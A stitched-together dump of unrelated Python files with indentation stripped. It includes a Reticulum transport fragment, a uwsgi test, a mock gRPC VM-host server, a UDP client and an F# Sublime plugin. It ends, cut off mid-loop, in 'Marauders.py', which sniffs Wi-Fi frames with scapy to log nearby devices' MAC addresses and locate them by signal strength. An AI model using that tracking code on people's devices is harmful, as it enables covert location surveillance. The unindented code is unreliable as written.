held_entry = Transport.announce_table[packet.destination_hash]
Transport.held_announces[packet.destination_hash] = held_entry
Transport.announce_table[packet.destination_hash] = [now, retransmit_timeout, retries, received_from, announce_hops, packet, local_rebroadcasts, block_rebroadcasts, attached_interface]
elif is_from_local_client:
# Forward path request on all interfaces
# except the local client
for interface in Transport.interfaces:
if not interface == attached_interface:
Transport.request_path_on_interface(destination_hash, interface)
elif not is_from_local_client and len(Transport.local_client_interfaces) > 0:
# Forward the path request on all local
# client interfaces
for interface in Transport.local_client_interfaces:
Transport.request_path_on_interface(destination_hash, interface)
else:
RNS.log("No known path to requested destination, ignoring request", RNS.LOG_DEBUG)
@staticmethod
def from_local_client(packet):
if hasattr(packet.receiving_interface, "parent_interface"):
return Transport.is_local_client_interface(packet.receiving_interface)
else:
return False
@staticmethod
def is_local_client_interface(interface):
if hasattr(interface, "parent_interface"):
if hasattr(interface.parent_interface, "is_local_shared_instance"):
return True
else:
return False
else:
return False
@staticmethod
def interface_to_shared_instance(interface):
if hasattr(interface, "is_connected_to_shared_instance"):
return True
else:
return False
@staticmethod
def exit_handler():
try:
if not RNS.Reticulum.transport_enabled():
Transport.packet_hashlist = []
else:
RNS.log("Saving packet hashlist to storage...", RNS.LOG_VERBOSE)
packet_hashlist_path = RNS.Reticulum.storagepath+"/packet_hashlist"
file = open(packet_hashlist_path, "wb")
file.write(umsgpack.packb(Transport.packet_hashlist))
file.close()
except Exception as e:
RNS.log("Could not save packet hashlist to storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
if not Transport.owner.is_connected_to_shared_instance:
RNS.log("Saving path table to storage...", RNS.LOG_VERBOSE)
try:
serialised_destinations = []
for destination_hash in Transport.destination_table:
# Get the destination entry from the destination table
de = Transport.destination_table[destination_hash]
interface_hash = de[5].get_hash()
# Only store destination table entry if the associated
# interface is still active
interface = Transport.find_interface_from_hash(interface_hash)
if interface != None:
timestamp = de[0]
received_from = de[1]
hops = de[2]
expires = de[3]
random_blobs = de[4]
packet_hash = de[6].get_hash()
serialised_entry = [
destination_hash,
timestamp,
received_from,
hops,
expires,
random_blobs,
interface_hash,
packet_hash
]
serialised_destinations.append(serialised_entry)
Transport.cache(de[6], force_cache=True)
destination_table_path = RNS.Reticulum.storagepath+"/destination_table"
file = open(destination_table_path, "wb")
file.write(umsgpack.packb(serialised_destinations))
file.close()
RNS.log("Done saving "+str(len(serialised_destinations))+" path table entries to storage", RNS.LOG_VERBOSE)
except Exception as e:
RNS.log("Could not save path table to storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
|
test_uwsgi_daemon.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# The MIT License (MIT)
# Copyright (c) 2020 SBofGaySchoolBuPaAnything
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
__author__ = "chenty"
# Add current folder and parent folder into python path
import os
os.environ["PYTHONPATH"] = os.environ.get("PYTHONPATH", "") + ":" + os.getcwd()
os.environ["PYTHONPATH"] += ":" + os.path.dirname(os.getcwd())
import sys
sys.path.append(os.getcwd())
sys.path.append(os.path.dirname(os.getcwd()))
import unittest
import multiprocessing
import signal
import time
import requests
import json
import flask
import tracemalloc
tracemalloc.start()
from utility.uwsgi.daemon import run
temp_server = flask.Flask(__name__)
@temp_server.route("/")
def index():
return "Hello World!"
# Unit test class for utility.uwsgi.daemon
class TestUwsgiDaemon(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""
Initialization function
:return: None
"""
print("Initializing environment.\n")
# Generate configuration files
with open("conf.json", "w") as f:
f.write(json.dumps({
"daemon": {},
"uwsgi": {
"exe": ["uwsgi", "--ini", "uwsgi.ini"],
"host": "0.0.0.0",
"port": "7000",
"module": "test_uwsgi_daemon:temp_server",
"master": True,
"processes": 2,
"threads": 2
}
}, indent=4))
# Sub processes
cls.uwsgi = None
return
def test_000_run_uwsgi_daemon(self):
"""
Test to run uwsgi through uwsgi daemon
:return: None
"""
cls = self.__class__
# Generate all daemon
cls.uwsgi = multiprocessing.Process(target=run, args=("Test", "conf.json"))
cls.uwsgi.daemon = True
cls.uwsgi.start()
time.sleep(5)
# Test http requests
self.assertEqual(requests.get("http://localhost:7000/").text, "Hello World!")
# Stop it
os.kill(cls.uwsgi.pid, signal.SIGINT)
cls.uwsgi.join()
return
@classmethod
def tearDownClass(cls):
"""
Cleaning function
:return: None
"""
print("Tearing down environment.\n")
# Stop subprocess
if cls.uwsgi and cls.uwsgi.is_alive():
if cls.uwsgi.pid:
os.kill(cls.uwsgi.pid, signal.SIGINT)
cls.uwsgi.join()
# Remove config file
os.remove("conf.json")
os.remove("uwsgi.ini")
return
if __name__ == "__main__":
unittest.main()
|
test_grpc_host_server.py
|
#!/usr/bin/env python
from concurrent import futures
import grpc
import sys
from time import sleep
from threading import Thread
sys.path.append('../../src/tira')
from proto import tira_host_pb2, tira_host_pb2_grpc
from test_grpc_host_client import TestGrpcHostClient
STATE = {"status": 'stopped'}
class TiraHostService(tira_host_pb2_grpc.TiraHostService):
def vm_backup(self, request, context):
print(f"received vm-backup for {request.vmId}")
response = tira_host_pb2.Transaction()
response.status = tira_host_pb2.Status.SUCCESS
response.transactionId = "12345"
return response
def vm_create(self, request, context):
print(f"received vm-create for {request.ovaFile} - {request.vmId} - {request.bulkCommandId}")
response = tira_host_pb2.Transaction()
response.status = tira_host_pb2.Status.SUCCESS
response.transactionId = "12345"
return response
def vm_delete(self, request, context):
print(f"received vm-delete for {request.vmId}")
response = tira_host_pb2.Transaction()
response.status = tira_host_pb2.Status.SUCCESS
response.transactionId = "12345"
return response
def vm_info(self, request, context):
print(f"received vm-info for {request.vmId}")
response = tira_host_pb2.VmInfo()
response.guestOs = 'test: ubuntu'
response.memorySize = 'test: 0'
response.numberOfCpus = 'test: 0'
response.sshPort = '0000'
response.rdpPort = '0000'
response.host = 'localhost'
if STATE.get('status') == 'running':
response.state = tira_host_pb2.State.RUNNING
response.sshPortStatus = True
response.rdpPortStatus = True
elif STATE.get('status') == 'stopped':
response.state = tira_host_pb2.State.POWERED_OFF
response.sshPortStatus = False
response.rdpPortStatus = False
elif STATE.get('status') == 'powering_on':
response.state = tira_host_pb2.State.POWERING_ON
response.sshPortStatus = False
response.rdpPortStatus = False
elif STATE.get('status') == 'powering_off':
response.state = tira_host_pb2.State.POWERING_OFF
response.sshPortStatus = False
response.rdpPortStatus = False
elif STATE.get('status') == 'sandboxed':
response.state = tira_host_pb2.State.EXECUTING
response.sshPortStatus = False
response.rdpPortStatus = False
elif STATE.get('status') == 'sandboxing':
response.state = tira_host_pb2.State.SANDBOXING
response.sshPortStatus = False
response.rdpPortStatus = False
elif STATE.get('status') == 'unsandboxing':
response.state = tira_host_pb2.State.UNSANDBOXING
response.sshPortStatus = False
response.rdpPortStatus = False
elif STATE.get('status') == 'archived':
response.state = tira_host_pb2.State.ARCHIVED
response.sshPortStatus = False
response.rdpPortStatus = False
else:
response.state = tira_host_pb2.State.UNDEFINED
response.sshPortStatus = False
response.rdpPortStatus = False
return response
def vm_list(self, request, context):
print("received vm-list")
response = tira_host_pb2.Transaction()
response.status = tira_host_pb2.Status.SUCCESS
response.transactionId = "12345"
return response
def vm_sandbox(self, request, context):
print(f"received vm-sandbox for {request.vmId}")
response = tira_host_pb2.Transaction()
response.status = tira_host_pb2.Status.SUCCESS
response.transactionId = "12345"
return response
def vm_shutdown(self, request, context):
print(f"received vm-shutdown for {request.vmId}")
response = tira_host_pb2.Transaction()
if STATE.get('status') == "running":
test_host_client = TestGrpcHostClient()
t = Thread(target=test_host_client.set_state, args=(request.vmId, tira_host_pb2.State.POWERED_OFF))
t.start()
response.status = tira_host_pb2.Status.SUCCESS
STATE['status'] = 'stopped'
else:
response.status = tira_host_pb2.Status.FAILED
response.transactionId = "12345"
return response
def vm_snapshot(self, request, context):
print(f"received vm-snapshot for {request.vmId}")
response = tira_host_pb2.Transaction()
response.status = tira_host_pb2.Status.FAILED
response.transactionId = "12345"
return response
def vm_start(self, request, context):
print(f"received vm-start for {request.vmId}")
response = tira_host_pb2.Transaction()
if STATE.get('status') == "stopped":
test_host_client = TestGrpcHostClient()
t = Thread(target=test_host_client.set_state, args=(request.vmId, tira_host_pb2.State.RUNNING))
t.start()
STATE['status'] = 'running' # Only works in the mockup server. Should be 'powering_on' in live.
response.status = tira_host_pb2.Status.SUCCESS
else:
response.status = tira_host_pb2.Status.FAILED
return response
def vm_stop(self, request, context):
print(f"received vm-stop for {request.vmId}")
response = tira_host_pb2.Transaction()
if STATE.get('status') in {"running", "sandboxed", "sandboxing"}:
response.status = tira_host_pb2.Status.SUCCESS
STATE['status'] = 'stopped'
else:
response.status = tira_host_pb2.Status.FAILED
response.transactionId = "12345"
return response
def vm_unsandbox(self, request, context):
print(f"received vm-unsandbox for {request.vmId}")
response = tira_host_pb2.Transaction()
response.status = tira_host_pb2.Status.SUCCESS
response.transactionId = "12345"
return response
def run_execute(self, request, context):
print(f"received run-execute for {request.submissionFile} - {request.inputDatasetName} - {request.inputRunPath} - {request.outputDirName} - {request.sandboxed} - {request.runId} - {request.snapshotName} - {request.optionalParameters}")
response = tira_host_pb2.Transaction()
response.status = tira_host_pb2.Status.SUCCESS
response.transactionId = "12345"
return response
def run_eval(self, request, context):
print(f"received run-eval for {request.submissionFile} - {request.inputDatasetName} - {request.inputRunPath} - {request.outputDirName} - {request.sandboxed} - {request.runId} - {request.snapshotName} - {request.optionalParameters}")
response = tira_host_pb2.Transaction()
response.status = tira_host_pb2.Status.SUCCESS
response.transactionId = "12345"
return response
def serve(port):
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
tira_host_pb2_grpc.add_TiraHostServiceServicer_to_server(TiraHostService(), server)
listen_addr = f'[::]:{port}'
server.add_insecure_port(listen_addr)
server.start()
print("Starting tira-host server on %s", listen_addr)
server.wait_for_termination()
if __name__ == '__main__':
serve("50051")
|
requester.py
|
import socket
import sys
import time
import threading
import errno
from termcolor import colored, cprint
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setblocking(0)
except socket.error:
print 'Failed to create socket'
sys.exit()
host = 'localhost';
port = 8888;
msg = '__client__'
s.sendto(msg, (host, port))
ping_counter = []
ping_counter.append(0)
def pingit():
threading.Timer(3.0, pingit).start()
pingStr = '__REQUESTER_PING__'
s.sendto(pingStr, (host, port))
ping_counter[0] += 1
print ping_counter
if ping_counter[0] > 3:
print "Server Not Responding...SHUTTING DOWN"
# s.close()
# s.shutdown(socket.SHUT_RDWR)
# quit()
# s.exit()
pingit()
msg = ''
def queryFun():
myQuery = raw_input("Please enter your query-> ")
myQuery = '__SEARCH__' + myQuery
s.sendto(myQuery, (host, port))
listener = threading.Thread(target=queryFun)
listener.start()
class c:
blue = '\033[94m'
rust = '\033[93m'
red = '\033[91m'
Green = '\033[92m'
Blue = '\033[94m'
Cyan = '\033[96m'
White = '\033[97m'
Yellow = '\033[93m'
Magenta = '\033[95m'
Grey = '\033[90m'
Black = '\033[90m'
Default = '\033[99m'
while(1) :
# msg = raw_input('Enter message to send : ')
try :
d = s.recvfrom(1024*10)
reply = d[0]
addr = d[1]
# print 'Server reply : ' + reply
# replyArray = reply.split('__')
# msg = replyArray[0]
if reply == '___I_IZ_ALAIVE__':
ping_counter[0] = 0
else:
if reply == '__END_RESULTS__':
listener = threading.Thread(target=queryFun)
listener.start()
# print "LOLOLOL"
else:
myarray = reply.split()
msg = myarray[0]
for word in reply.split():
if word not in msg:
print c.Default+word,
else:
print c.red+word,
print '\n'
f = open('myfile.txt', 'a')
print >> f, reply
# for i in range(0, 1000000):
# f.write(reply)
# f.close()
except socket.error, e:
if e.args[0] == errno.EWOULDBLOCK:
# print 'Wating for data(server)'
time.sleep(0.001)
else:
print e
continue
# except socket.error, msg:
# print 'Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
# sys.exit()
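# Wire protocol summary (derived from the code above):
#   '__client__'          -> sent once to register with the server
#   '__REQUESTER_PING__'  -> sent every 3 s; '___I_IZ_ALAIVE__' resets the
#                            missed-ping counter
#   '__SEARCH__<query>'   -> submits a search query
#   '__END_RESULTS__'     -> server marker that all results were delivered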
|
project.py
|
import sublime
import sublime_plugin
from queue import Queue
import queue
from threading import Thread
from zipfile import ZipFile
import os
from FSharp.lib import const
from FSharp.lib.fsac import get_server
from FSharp.lib import fs
tasks = Queue()
task_results = Queue()
SIG_QUIT = '<<QUIT>>'
def plugin_loaded():
"""
Initializes plugin.
"""
# Install binaries if needed.
if not installation.check_binaries():
installation.install_binaries()
print('FSharp: Binaries installed. Everything ok.')
else:
print('FSharp: Binaries found. Everything ok.')
# Start the pipe server.
AsyncPipe()
def plugin_unloaded():
tasks.put((SIG_QUIT, ()))
class AsyncPipe(object):
"""
Wraps the fsac server to make it asynchronous.
"""
def __init__(self):
self.server = get_server()
self.tasks = tasks
writer = Thread(target=self.write, daemon=True)
reader = Thread(target=self.read, daemon=True)
writer.start()
reader.start()
def write(self):
while True:
action, args = self.tasks.get()
method = getattr(self.server, action, None)
if self.server.proc.poll() is not None:
print("FSharp: Server process unavailable. "
"Exiting writer thread.")
break
if action == SIG_QUIT:
# Give the other thread a chance to exit. This check must come
# before the method check, since SIG_QUIT is not a server method
# and getattr() returns None for it.
self.tasks.put((action, args))
break
if not method:
process_output({'Kind': 'ERROR', 'Data': 'Not a valid call.'})
continue
# Write to server's stdin.
method(*args)
def read(self):
while True:
output = self.server.read_line()
if output['Kind'] == 'completion':
task_results.put(output)
else:
process_output(output)
if self.server.proc.poll() is not None:
print("FSharp: Server process unavailable. "
"Exiting reader thread.")
break
try:
# Don't block here so we can read all the remaining output.
action, args = self.tasks.get(timeout=0.01)
except:
continue
if action == SIG_QUIT:
# Give the other thread a chance to exit.
self.tasks.put((action, args))
break
self.tasks.put((action, args))
class actions:
"""
Groups methods that process data received from the autocomplete server.
"""
@staticmethod
def generic_action(data=None):
sublime.status_message("RECEIVED: " + str(data))
print("RECEIVED: " + str(data))
@staticmethod
def show_info(data):
print(data)
@staticmethod
def find_declaration(data):
data = data['Data']
fname = data['File']
row = data['Line'] + 1
col = data['Column'] + 1
encoded = "{0}:{1}:{2}".format(fname, row, col)
sublime.active_window().open_file(encoded, sublime.ENCODED_POSITION)
@staticmethod
def declarations(data):
decls = data['Data']
print(decls)
@staticmethod
def show_completions(data):
v = sublime.active_window().active_view()
v.show_popup_menu(data['Data'], None)
@staticmethod
def show_tooltip(data):
v = sublime.active_window().active_view()
v.show_popup_menu([line for line in data['Data'].split('\n') if line],
None)
class requests:
@staticmethod
def parse(view):
tasks.put(('parse', (view.file_name(), True)))
@staticmethod
def completions(view):
requests.parse(view)
row, col = view.rowcol(view.sel()[0].b)
tasks.put(('completions', (view.file_name(), row, col)))
@staticmethod
def declarations(view):
requests.parse(view)
tasks.put(('declarations', (view.file_name(),)))
@staticmethod
def tooltip(view):
requests.parse(view)
row, col = view.rowcol(view.sel()[0].b)
tasks.put(('tooltip', (view.file_name(), row, col)))
def process_output(data):
action = None
if data['Kind'] == 'completion':
raise ValueError('completion results should be handled in a different way')
elif data['Kind'] == 'tooltip':
action = actions.show_tooltip
elif data['Kind'] == 'INFO':
action = actions.show_info
elif data['Kind'] == 'finddecl':
action = actions.find_declaration
elif data['Kind'] == 'declarations':
action = actions.declarations
elif data['Kind'] == 'project':
for fname in data['Data']:
tasks.put(('parse', (fname, True)))
else:
action = actions.generic_action
if action:
# Run action on the main UI thread to make ST happy.
sublime.set_timeout(lambda: action(data), 0)
class installation:
@staticmethod
def check_binaries():
print('FSharp: Checking installed files')
return os.path.exists(const.path_to_fs_ac_binary())
@staticmethod
def install_binaries():
print('FSharp: Installing files to Packages/FSharp_Binaries...')
sublime.status_message('FSharp: Installing files to Packages/FSharp_Binaries...')
try:
os.mkdir(const.path_to_fs_binaries())
except IOError:
pass
zipped_bytes = sublime.load_binary_resource('Packages/FSharp/bundled/fsautocomplete.zip')
target = os.path.join(const.path_to_fs_binaries(), 'fsautocomplete.zip')
with open(target, 'wb') as f:
f.write(zipped_bytes)
with open(target, 'rb') as f:
ZipFile(f).extractall(path=const.path_to_fs_binaries())
os.unlink(target)
class FsSetProjectFile(sublime_plugin.WindowCommand):
def is_enabled(self):
v = self.window.active_view()
if v and fs.is_fsharp_project(v.file_name()):
return True
msg = 'FSharp: Not a project file.'
print(msg)
sublime.status_message(msg)
return False
def run(self):
v = self.window.active_view()
sublime.status_message('FSharp: Loading project...')
tasks.put(('project', (v.file_name(),)))
class FsGetTooltip(sublime_plugin.WindowCommand):
def is_enabled(self):
v = self.window.active_view()
if v and fs.is_fsharp_code(v.file_name()):
return True
msg = 'FSharp: Not an F# code file.'
print(msg)
sublime.status_message(msg)
return False
def run(self):
v = self.window.active_view()
requests.tooltip(v)
class FsDeclarations(sublime_plugin.WindowCommand):
def is_enabled(self):
v = self.window.active_view()
if v and fs.is_fsharp_code(v.file_name()):
return True
msg = 'FSharp: Not an F# code file.'
print(msg)
sublime.status_message(msg)
return False
def run(self):
v = self.window.active_view()
requests.declarations(v)
class FsStEvents(sublime_plugin.EventListener):
def on_query_completions(self, view, prefix, locations):
if not fs.is_fsharp_code(view.file_name()):
return []
while not task_results.empty():
task_results.get()
# A request for completions is treated especially: the result will
# be published to a queue.
requests.completions(view)
completions = []
try:
completions = task_results.get(timeout=0.2)
completions = completions['Data']
except queue.Empty:
# Too bad. The daemon was too slow.
pass
# TODO: Necessary? (It seems so.)
flags = (sublime.INHIBIT_EXPLICIT_COMPLETIONS |
sublime.INHIBIT_WORD_COMPLETIONS)
return [[c, c] for c in completions], flags
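# Illustrative sketch (an assumption, not part of the original source):
# how a command talks to the AsyncPipe above. Work items are
# (action, args) tuples; completion results come back on task_results.
#
# tasks.put(('parse', ('/path/to/File.fs', True)))  # hypothetical path
# tasks.put((SIG_QUIT, ()))                         # shuts both threads down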
|
Marauders.py
|
# -*- coding: utf-8 -*-
from math import sqrt, floor, ceil
import os, time, sys, yaml, kirk
import Tkconstants as C
#import tkinter.constants as C
from Tkinter import Tk, Frame, LEFT, Button, Label, PhotoImage, TOP, \
FLAT, BOTH, Image
from PIL import Image, ImageTk, ImageDraw
import threading
import thread
import sys
import signal
import scapy.all as sca
import scapy_ex
import channel_hop
import pickle
import numpy as n
import signal
from subprocess import Popen, PIPE
iface = None
realt = False
fingerprint = {}
box_size = 15
map_size = 240//box_size
radiotap_formats = {"TSFT":"Q", "Flags":"B", "Rate":"B",
"Channel":"HH", "FHSS":"BB", "dBm_AntSignal":"b", "dBm_AntNoise":"b",
"Lock_Quality":"H", "TX_Attenuation":"H", "dB_TX_Attenuation":"H",
"dBm_TX_Power":"b", "Antenna":"B", "dB_AntSignal":"B",
"dB_AntNoise":"B", "b14":"H", "b15":"B", "b16":"B", "b17":"B", "b18":"B",
"b19":"BBB", "b20":"LHBB", "b21":"HBBBBBH", "b22":"B", "b23":"B",
"b24":"B", "b25":"B", "b26":"B", "b27":"B", "b28":"B", "b29":"B",
"b30":"B", "Ext":"B"}
def parsePacket(pkt):
if pkt.haslayer(sca.Dot11):
if pkt.addr2 is not None:
return pkt.addr2, pkt.dBm_AntSignal
return None, None
class FlatButton(Button):
def __init__(self, master=None, cnf={}, **kw):
Button.__init__(self, master, cnf, **kw)
self.config(
compound=TOP,
relief=FLAT,
bd=0,
bg="#b91d47", # dark-red
fg="white",
activebackground="#b91d47", # dark-red
activeforeground="white",
highlightthickness=0
)
def set_color(self, color):
self.configure(
bg=color,
fg="white",
activebackground=color,
activeforeground="white"
)
class Marauders(Frame):
doc = None
framestack = []
icons = {}
path = ''
def __init__(self, parent):
Frame.__init__(self, parent, background="white")
self.parent = parent
self.pack(fill=BOTH, expand=1)
self.path = os.path.dirname(os.path.realpath(sys.argv[0]))
with open(self.path + '/Marauders.yaml', 'r') as f:
self.doc = yaml.safe_load(f)
self.show_items(self.doc)
def show_items(self, items, upper=[]):
"""
Creates a new page on the stack, automatically adds a back button when there are
pages on the stack already
:param items: list the items to display
:param upper: list previous levels' ids
:return: None
"""
num = 0
# create a new frame
wrap = Frame(self, bg="black")
# when there were previous frames, hide the top one and add a back button for the new one
if len(self.framestack):
self.hide_top()
back = FlatButton(
wrap,
text='Back…',
image=self.get_icon("arrow.left"),
command=self.go_back,
)
exitbtn = FlatButton(
wrap,
text='Exit…',
image=self.get_icon("exit"),
command=self.app_exit,
)
back.set_color("#00a300") # green
exitbtn.set_color("#00a300") # green
back.grid(row=0, column=0, padx=1, pady=1, sticky=C.W + C.E + C.N + C.S)
num +=1
exitbtn.grid(row=0, column=1, padx=1, pady=1, sticky=C.W + C.E + C.N + C.S)
num += 1
# add the new frame to the stack and display it
self.framestack.append(wrap)
self.show_top()
# calculate tile distribution
total = len(items) + num
rows = floor(sqrt(total))
cols = ceil(total / rows)
# make cells autoscale
for x in range(int(cols)):
wrap.columnconfigure(x, weight=1)
for y in range(int(rows)):
wrap.rowconfigure(y, weight=1)
# display all given buttons
for item in items:
act = upper + [item['name']]
if 'icon' in item:
image = self.get_icon(item['icon'])
else:
image = self.get_icon('scrabble.' + item['label'][0:1].lower())
btn = FlatButton(
wrap,
text=item['label'],
image=image
)
if 'items' in item:
# this is a deeper level
btn.configure(command=lambda act=act, item=item:
self.show_items(item['items'], act), text=item['label'] + '…')
btn.set_color("#2b5797") # dark-blue
elif item['name'] == 'Locator':
# this is an action
btn.configure(command=lambda act=act: self.realtime(), )
else:
# this is an action
print act
btn.configure(command=lambda act=item['name']: self.capture(act), )
if 'color' in item:
btn.set_color(item['color'])
# add button to the grid
btn.grid(
row=int(floor(num / cols)),
column=int(num % cols),
padx=1,
pady=1,
sticky=C.W + C.E + C.N + C.S
)
num += 1
def get_icon(self, name):
"""
Loads the given icon and keeps a reference
:param name: string
:return:
"""
if name in self.icons:
return self.icons[name]
ico = self.path + '/ico/' + name + '.gif'
# In case icon cannot be found display the cancel icon
if not os.path.isfile(ico):
ico = self.path + '/ico/cancel.gif'
self.icons[name] = PhotoImage(file=ico)
return self.icons[name]
def hide_top(self):
"""
hide the top page
:return:
"""
self.framestack[len(self.framestack) - 1].pack_forget()
def show_top(self):
"""
show the top page
:return:
"""
self.framestack[len(self.framestack) - 1].pack(fill=BOTH, expand=1)
def record(self, x, y, z, iface):
global fingerprint
now = time.time()
rssi={}
future = now + 10
while time.time() < future:
#os.system("sudo hciconfig hci0 reset")
#p = Popen([self.path+"/ibeacon_scan","-b"], stdout=PIPE, stderr=PIPE, preexec_fn=os.setsid)
packets = sca.sniff(iface=iface, timeout = 10)
#os.killpg(p.pid, signal.SIGTERM)
#bl_packets = p.stdout.read().split('\n')
bl_packets = [] #Empty bluetooth until it works properly
for pkt in packets:
mac, strength = parsePacket(pkt)
if mac is not None and strength is not None and strength < 0:
if mac in rssi:
if z in rssi[mac]:
rssi[mac][z][x][y].append(strength)
else:
arr = [[[] for _ in range(map_size)] for _ in range(map_size)]
rssi[mac].update({z:arr})
rssi[mac][z][x][y].append(strength)
else:
if mac != "48:5a:3f:45:21:0f": #Filter out my cellphone
arr = [[[] for _ in range(map_size)] for _ in range(map_size)]
new_map = {}
new_map.update({z:arr})
rssi.update({mac:new_map})
rssi[mac][z][x][y].append(strength)
for pkt in bl_packets:
content = pkt.split()
if len(content) == 2:
mac = content[0]
strength = int(content[1])
if mac is not None and strength is not None and strength < 0:
if mac in rssi:
if z in rssi[mac]:
rssi[mac][z][x][y].append(strength)
else:
arr = [[[] for _ in range(map_size)] for _ in range(map_size)]
rssi[mac].update({z:arr})
rssi[mac][z][x][y].append(strength)
else:
arr = [[[] for _ in range(map_size)] for _ in range(map_size)]
new_map = {}
new_map.update({z:arr})
rssi.update({mac:new_map})
rssi[mac][z][x][y].append(strength)
#Now that we have the data, calculate averages for each location
for mac in rssi:
if mac in fingerprint:
if z in fingerprint[mac]:
avg = fingerprint[mac][z]
else:
avg = [[None for _ in range(map_size)] for _ in range(map_size)]
else:
avg = [[None for _ in range(map_size)] for _ in range(map_size)]
fingerprint.update({mac:{}})
for x in range(len(rssi[mac][z])):
for y in range(len(rssi[mac][z][x])):
l = rssi[mac][z][x][y]
if len(l) > 0:
avg[x][y] = n.mean(l)
#avg[x][y] = trimmean(l, 80)
fingerprint[mac].update({z:avg})
finger_file = open(self.path + '/fingerprint.pkl', 'wb')
pickle.dump(fingerprint, finger_file)
finger_file.close()
def capture(self, map):
self.map = map
box_size = 15
print map
# create a new frame
wrap = Frame(self, bg="black")
self.hide_top()
# label showing the image
self.image = Image.open(self.path + "/" + map + ".gif")
draw = ImageDraw.Draw(self.image)
for x in range(1, 240//box_size):
draw.line((box_size*x, 0, box_size*x, 240), fill=128, width=1)
for y in range(1, 240//box_size):
draw.line((0, box_size*y, 240, box_size*y), fill=128, width=1)
self.image = ImageTk.PhotoImage(self.image)
imagelabel = Label(wrap, image=self.image)
imagelabel.grid(row=0, column=0, columnspan=2, sticky=C.W + C.E + C.N + C.S)
imagelabel.bind('<Button-1>', self.printcoords)
# when there were previous frames, hide the top one and add a back button for the new one
if len(self.framestack):
self.hide_top()
back = FlatButton(
wrap,
text='Back…',
image=self.get_icon("arrow.left"),
command= self.go_back,
)
exitbtn = FlatButton(
wrap,
text='Exit…',
image=self.get_icon("exit"),
command=self.app_exit,
)
back.set_color("#00a300") # green
exitbtn.set_color("#00a300") # green
back.grid(row=1, column=0, padx=1, pady=1, sticky=C.W + C.E + C.N + C.S)
exitbtn.grid(row=1, column=1, padx=1, pady=1, sticky=C.W + C.E + C.N + C.S)
#num += 1
# add the new frame to the stack and display it
self.framestack.append(wrap)
self.show_top()
self.parent.update()
def blink(self):
wrap = Frame(self, bg="green")
self.hide_top()
if len(self.framestack):
self.hide_top()
self.framestack.append(wrap)
self.show_top()
self.parent.update()
#function to be called when mouse is clicked
def printcoords(self, event):
#outputting x and y coords to console
print (event.x//box_size, event.y//box_size)
self.blink()
self.record(event.x//box_size, event.y//box_size, self.map, iface)
self.go_back()
print "DONE"
def realtime(self):
global realt
box_size = 15
# create a new frame
wrap = Frame(self, bg="black")
self.hide_top()
# label showing the image
self.image = Image.open(self.path + "/kirk-auditorium2.gif")
draw = ImageDraw.Draw(self.image)
self.image = ImageTk.PhotoImage(self.image)
imagelabel = Label(wrap, image=self.image)
imagelabel.grid(row=0, column=0, columnspan=2, sticky=C.W + C.E + C.N + C.S)
num = 0
# when there were previous frames, hide the top one and add a back button for the new one
if len(self.framestack):
self.hide_top()
back = FlatButton(
wrap,
text='Back…',
image=self.get_icon("arrow.left"),
command= self.go_back,
)
exitbtn = FlatButton(
wrap,
text='Exit…',
image=self.get_icon("exit"),
command=self.app_exit,
)
back.set_color("#00a300") # green
exitbtn.set_color("#00a300") # green
back.grid(row=1, column=0, padx=1, pady=1, sticky=C.W + C.E + C.N + C.S)
exitbtn.grid(row=1, column=1, padx=1, pady=1, sticky=C.W + C.E + C.N + C.S)
num += 1
realt = True
# add the new frame to the stack and display it
self.framestack.append(wrap)
self.show_top()
self.parent.update()
self.after(1,self.realtime_calculation, imagelabel)
def realtime_calculation(self, imagelabel):
global realt
global box_size
fingerprint_file = open(self.path+'/fingerprint.pkl', 'rb')
fingerprint = pickle.load(fingerprint_file)
fingerprint_file.close()
max_x = 0
max_y = 0
difference = {}
num_macs = {}
for mac in fingerprint:
for z in fingerprint[mac]:
difference.update({z:[]})
num_macs.update({z:[]})
if len(fingerprint[mac][z]) > max_x:
max_x = len(fingerprint[mac][z])
for x in range(len(fingerprint[mac][z])):
if len(fingerprint[mac][z][x]) > max_y:
max_y = len(fingerprint[mac][z][x])
while realt:
compare = {}
bl_count = 0
wifi_count = 0
#os.system("sudo hciconfig hci0 reset")
#p = Popen([self.path+"/ibeacon_scan","-b"], stdout=PIPE, stderr=PIPE, preexec_fn=os.setsid)
packets = sca.sniff(iface=iface, timeout=1)
#sys.stdout.flush()
#os.killpg(p.pid, signal.SIGTERM)
#bl_packets = p.stdout.read().split('\n')
bl_packets = [] # empty until bluetooth works
for pkt in packets:
mac, strength = parsePacket(pkt)
if mac is not None and strength is not None and strength < 0:
if mac in compare:
compare[mac].append(strength)
else:
wifi_count = wifi_count + 1
arr = []
compare.update({mac:arr})
compare[mac].append(strength)
for pkt in bl_packets:
content = pkt.split()
if len(content) == 2:
mac = str(content[0])
strength = int(content[1])
print mac, strength
if mac is not None and strength is not None and strength < 0:
if mac in compare:
compare[mac].append(strength)
else:
bl_count = bl_count + 1
arr = []
compare.update({mac:arr})
compare[mac].append(strength)
compare_avg = {}
for mac in compare:
l = compare[mac]
avg = n.mean(l)
#avg = trimmean(l, 80)
compare_avg.update({mac:avg})
guess = []
weight = []
for z in difference:
difference[z] = [[None]*max_y for _ in range(max_x)]
num_macs[z] = [[0]*max_y for _ in range(max_x)]
for mac in compare_avg:
least = None
location = []
if mac in fingerprint:
